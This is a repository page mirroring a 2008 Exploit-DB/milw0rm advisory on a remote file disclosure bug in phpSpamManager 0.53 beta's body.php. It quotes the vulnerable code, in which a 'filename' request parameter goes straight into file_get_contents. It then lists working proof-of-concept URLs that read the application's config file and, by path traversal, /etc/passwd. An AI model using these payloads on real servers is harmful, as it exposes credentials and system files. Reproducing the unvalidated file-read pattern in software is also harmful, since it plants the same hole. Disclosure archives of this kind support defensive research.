bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5328.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
751 B
Text
Raw Blame History

phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000
Vuln Code
Ln 38 -> 47 :
//get filename
$okprint=false;
$filename = $_REQUEST['filename']; <--- XxX
if ($filename!='FILENAME')
{
debug_print("analysing " .$filename);
//replace # by dots if necessary
$filename = preg_replace("/#/",".",$filename);
$mailtext=file_get_contents($filename); <--- XxX
$email=new parseMail($mailtext); <--- XxX
POC :
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd
I'm Mahmood_ali --- I'm Tryagi
# milw0rm.com [2008-03-31]
Reference in a new issue View git blame Copy permalink